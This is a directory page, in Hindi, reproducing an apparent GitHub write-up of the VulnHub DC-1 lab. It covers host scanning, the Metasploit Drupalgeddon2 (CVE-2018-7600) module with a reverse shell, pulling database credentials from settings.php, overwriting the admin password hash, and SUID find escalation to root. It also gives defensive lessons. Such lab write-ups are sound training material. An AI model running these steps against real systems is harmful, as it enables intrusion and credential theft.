Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
VulnHub-DC1-Writeup — VulnHub DC-1 boot-to-root — RCE के लिए CVE-2018-7600 (Drupalgeddon2) का शोषण, settings.php से DB क्रेडेंशियल निकालना, एडमिन पासवर्ड हैश गढ़ना, और SUID find के जरिए root तक विशेषाधिकार बढ़ाना। | Kitploit
उपकरण/GitHubGitHub/prapul1/vulnhub-dc1-writeup
विशेषाधिकार वृद्धिटोहीशोषण फ्रेमवर्कपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनलर्निंग और शिक्षा
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubprapul1/vulnhub-dc1-writeup

VulnHub-DC1-Writeup

VulnHub DC-1 boot-to-root — RCE के लिए CVE-2018-7600 (Drupalgeddon2) का शोषण, settings.php से DB क्रेडेंशियल निकालना, एडमिन पासवर्ड हैश गढ़ना, और SUID find के जरिए root तक विशेषाधिकार बढ़ाना।

रिपॉजिटरी देखें

VulnHub-DC1-Writeup

"पेनिट्रेशन टेस्टिंग लैब राइटअप जो पूर्ण अटैक चेन का दस्तावेज़ीकरण करते हैं — रिकॉन से रूट तक।"

🔓 VulnHub — DC-1 बूट-टू-रूट राइटअप

कठिनाई: शुरुआती–मध्यवर्ती
प्लेटफ़ॉर्म: VulnHub
लक्ष्य: सभी 4 फ़्लैग प्राप्त करना और पूर्ण रूट-स्तरीय समझौता हासिल करना
हमलावर OS: Kali Linux (VirtualBox — NAT नेटवर्क)
लक्ष्य OS: Debian Linux (Drupal 7 CMS)


📌 विषय-सूची

  1. लैब सेटअप
  2. रिकॉनिसांस और एन्यूमरेशन
  3. एक्सप्लॉइटेशन — रिमोट कोड एक्सीक्यूशन
  4. पोस्ट-एक्सप्लॉइटेशन — शेल स्टेबिलाइज़ेशन
  5. फ़्लैग 1 — वेब सर्वर एन्यूमरेशन
  6. फ़्लैग 2 — डेटाबेस क्रेडेंशियल निष्कर्षण
  7. फ़्लैग 3 — हैश मैनिपुलेशन द्वारा एडमिन पैनल एक्सेस
  8. फ़्लैग 4 और रूट — SUID प्रिविलेज एस्केलेशन
  9. कौशल और टूल सारांश
  10. मुख्य निष्कर्ष

🛠 लैब सेटअप

घटकविवरण
हाइपरवाइज़रVirtualBox
नेटवर्क मोड

दोनों वर्चुअल मशीनों को VirtualBox में एक ही NAT नेटवर्क के अंतर्गत कॉन्फ़िगर किया गया था ताकि आपसी VM संचार संभव हो सके और एक पृथक लैब वातावरण बना रहे।


🔍 रिकॉनिसांस और एन्यूमरेशन

होस्ट डिस्कवरी

स्थानीय सबनेट पर सभी सक्रिय होस्ट की पहचान के लिए arp-scan का उपयोग किया गया:

root@kitploit:~
sudo arp-scan -l

परिणाम: लक्ष्य 10.0.2.3 पर पहचाना गया

सेवा और पोर्ट स्कैनिंग

वर्जन डिटेक्शन और डिफ़ॉल्ट स्क्रिप्ट के साथ पूर्ण Nmap स्कैन चलाया गया:

root@kitploit:~
sudo nmap -sV -sC 10.0.2.3

मुख्य निष्कर्ष:

पोर्टसेवावर्जन
22/tcpSSHOpenSSH 6.0p1
80/tcpHTTPApache 2.2.22
111/tcprpcbind—

🔑 महत्वपूर्ण: Nmap ने HTTP जनरेटर हेडर के माध्यम से वेब एप्लिकेशन को स्पष्ट रूप से Drupal 7 के रूप में पहचाना — जो एक ज्ञात संवेदनशील CMS वर्जन की पुष्टि करता है।


💥 एक्सप्लॉइटेशन — रिमोट कोड एक्सीक्यूशन

भेद्यता: Drupalgeddon2 (CVE-2018-7600)

Drupal 7 अपने Form API में एक गंभीर रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता से प्रभावित है। एक अनप्रमाणित हमलावर एक विशेष रूप से तैयार HTTP अनुरोध भेज सकता है जिसे बैकएंड एक सिस्टम कमांड के रूप में निष्पादित करता है — बिना किसी प्रमाणीकरण की आवश्यकता के।

Metasploit Framework लॉन्च किया गया:

root@kitploit:~
msfconsole
search drupalgeddon
use exploit/multi/http/drupal_drupageddon2
set RHOSTS 10.0.2.3
exploit

परिणाम: Meterpreter रिवर्स शेल www-data (वेब सर्वर प्रोसेस यूज़र) के रूप में सफलतापूर्वक खुल गई।


🐚 पोस्ट-एक्सप्लॉइटेशन — शेल स्टेबिलाइज़ेशन

Meterpreter से नेटिव Linux शेल में उतरकर Python PTY का उपयोग करके उसे स्टेबिलाइज़ किया गया:

root@kitploit:~
shell
python -c 'import pty; pty.spawn("/bin/bash")'

परिणाम: /var/www के अंदर www-data@DC-1 के रूप में पूर्णतः इंटरैक्टिव bash शेल प्राप्त हुई।


🚩 फ़्लैग 1 — वेब सर्वर एन्यूमरेशन

root@kitploit:~
ls -la /var/www
cat flag1.txt

फ़्लैग 1 सामग्री:

root@kitploit:~
Every good CMS needs a config file - and so do you.

💡 संकेत: सीधे Drupal कॉन्फ़िगरेशन फ़ाइल — settings.php की ओर इशारा करता है


🚩 फ़्लैग 2 — डेटाबेस क्रेडेंशियल निष्कर्षण

Drupal कॉन्फ़िग निर्देशिका में नेविगेट करके सेटिंग्स फ़ाइल का निरीक्षण किया गया:

root@kitploit:~
cd /var/www/sites/default
cat settings.php

$databases ऐरे में एम्बेडेड क्रेडेंशियल मिले:

फ़ील्डमान
डेटाबेसdrupaldb
उपयोगकर्ता नामdbuser
पासवर्डR0ck3t

फ़्लैग 2 सामग्री (फ़ाइल टिप्पणियों से):

root@kitploit:~
Brute force and dictionary attacks aren't the only ways to gain access
(and you WILL need access). What can you do with these credentials?

💡 संकेत: बिना कुछ ब्रूट-फोर्स किए MySQL बैकएंड तक पहुँचने के लिए क्रेडेंशियल का उपयोग करें।


🚩 फ़्लैग 3 — हैश मैनिपुलेशन द्वारा एडमिन पैनल एक्सेस

चरण 1: डेटाबेस एन्यूमरेशन

root@kitploit:~
mysql -u dbuser -pR0ck3t
use drupaldb;
select uid, name, pass from users;

admin और fred दोनों के हैश किए गए पासवर्ड मिले — दोनों Drupal की $S$ हैशिंग योजना (SHA-512 आधारित) का उपयोग करते हैं।

चरण 2: कस्टम पासवर्ड हैश तैयार करना

मौजूदा हैश को क्रैक करने के बजाय, नया हैश उत्पन्न करने के लिए Drupal के स्वयं के अंतर्निहित PHP स्क्रिप्ट का उपयोग किया गया:

root@kitploit:~
cd /var/www
php scripts/password-hash.sh password123

आउटपुट: password123 के लिए एक मान्य $S$D... हैश

चरण 3: SQL के माध्यम से एडमिन पासवर्ड अधिलेखित करना

root@kitploit:~
use drupaldb;
update users set pass='$S$DUxDdAfJe08Z9viU5Tly0uUZXFThRFMpeBwz4T07HB6Rj0Fm2JTp' where name='admin';

http://10.0.2.3 में admin / password123 के रूप में सफलतापूर्वक लॉगिन किया गया।

फ़्लैग 3 सामग्री (Drupal एडमिन कंटेंट पैनल में मिली):

root@kitploit:~
Special PERMS will help FIND the passwd - but you'll need to -exec
that command to work out how to get what's in the shadow.

💡 संकेत: find कमांड पर SUID बाइनरी गलत कॉन्फ़िगरेशन — प्रिविलेज एस्केलेशन वेक्टर की पहचान की गई।


🚩 फ़्लैग 4 और रूट — SUID प्रिविलेज एस्केलेशन

चरण 1: सिस्टम यूज़र्स की एन्यूमरेशन

root@kitploit:~
cat /etc/passwd

/home/flag4 पर होम डायरेक्टरी वाला यूज़र flag4 ढूंढा गया।

root@kitploit:~
cat /home/flag4/flag4.txt

फ़्लैग 4 सामग्री:

root@kitploit:~
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?

चरण 2: find के माध्यम से SUID एक्सप्लॉइटेशन

find बाइनरी पर SUID बिट सेट था, जिसका अर्थ है कि यह चलाने वाले व्यक्ति की परवाह किए बिना फ़ाइल स्वामी (रूट) के विशेषाधिकारों के साथ निष्पादित होता है।

root@kitploit:~
find . -exec /bin/sh \;
whoami
# root

चरण 3: रूट फ़्लैग

root@kitploit:~
cd /root
cat thefinalflag.txt
root@kitploit:~
Well done!!! Hope you enjoyed DC-1!

पूर्ण रूट समझौता प्राप्त हुआ। ✅


🛠 कौशल और टूल सारांश

उपयोग किए गए टूल

प्रदर्शित कौशल

  • ✅ नेटवर्क रिकॉनिसांस और होस्ट डिस्कवरी
  • ✅ सेवा फ़िंगरप्रिंटिंग और CMS पहचान
  • ✅ CVE अनुसंधान और सार्वजनिक एक्सप्लॉइट उपयोग
  • ✅ Metasploit Framework — पेलोड परिनियोजन
  • ✅ पोस्ट-एक्सप्लॉइटेशन और लेटरल मूवमेंट
  • ✅ डेटाबेस एन्यूमरेशन और क्रेडेंशियल निष्कर्षण
  • ✅ पासवर्ड हैश फोर्जिंग और CLI के माध्यम से SQL इंजेक्शन
  • ✅ Linux SUID बाइनरी ऑडिटिंग
  • ✅ रूट तक प्रिविलेज एस्केलेशन

📚 मुख्य निष्कर्ष

आक्रामक दृष्टिकोण से:

  • अपैच्ड CMS प्लेटफ़ॉर्म (यहाँ तक कि 1–2 प्रमुख वर्जन पुराने) सार्वजनिक CVE और Metasploit मॉड्यूल के माध्यम से आसानी से एक्सप्लॉइट हो जाते हैं।
  • settings.php जैसी कॉन्फ़िगरेशन फ़ाइलों में अक्सर प्लेनटेक्स्ट क्रेडेंशियल मौजूद होते हैं जो हमलावर को वेब एक्सेस से पूर्ण डेटाबेस नियंत्रण तक ले जाते हैं।
  • find, vim, या python जैसी सामान्य बाइनरी पर SUID गलत कॉन्फ़िगरेशन Linux वातावरण में सबसे विश्वसनीय प्रिविलेज एस्केलेशन वेक्टरों में से एक है।

रक्षात्मक दृष्टिकोण से:

  • CMS प्लेटफ़ॉर्म को तुरंत पैच करें — Drupalgeddon2 के लिए पैच उपलब्ध थे; भेद्यता उन्हें लागू करने में देरी थी।
  • गोपनीय जानकारी (DB क्रेडेंशियल) को बिना एन्क्रिप्शन या एनवायरनमेंट वेरिएबल एब्स्ट्रैक्शन के वेब-एक्सेसिबल कॉन्फ़िग फ़ाइलों में कभी नहीं रखना चाहिए।
  • नियमित रूप से SUID बाइनरी की ऑडिट करें: find / -perm -4000 -type f 2>/dev/null किसी भी Linux हार्डनिंग चेकलिस्ट का हिस्सा होना चाहिए।

⚠️ अस्वीकरण

यह राइटअप पूर्णतः शैक्षिक उद्देश्यों के लिए है और यह एक पृथक, कानूनी लैब वातावरण में किए गए कार्यों का दस्तावेज़ीकरण करता है। इन तकनीकों को कभी भी उन प्रणालियों पर आज़माएं नहीं जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।


Prapul द्वारा पूर्ण | TryHackMe प्रोफ़ाइल | GitHub

टूल डाउनलोड करें
NAT नेटवर्क (दोनों VM एक ही सबनेट पर)
हमलावर मशीनKali Linux
लक्ष्य मशीनDC-1 (VulnHub)
लक्ष्य IP10.0.2.3 (arp-scan द्वारा खोजा गया)
टूलउद्देश्य
arp-scanस्थानीय सबनेट पर होस्ट डिस्कवरी
nmapपोर्ट स्कैनिंग और सेवा फ़िंगरप्रिंटिंग
Metasploit FrameworkCVE-2018-7600 एक्सप्लॉइट डिलीवरी और रिवर्स शेल
MySQL CLIडेटाबेस एन्यूमरेशन और क्रेडेंशियल मैनिपुलेशन
PHP (password-hash.sh)नेटिव Drupal हैश जनरेशन
Python PTYशेल स्टेबिलाइज़ेशन
VirtualBoxपृथक लैब वातावरण सेटअप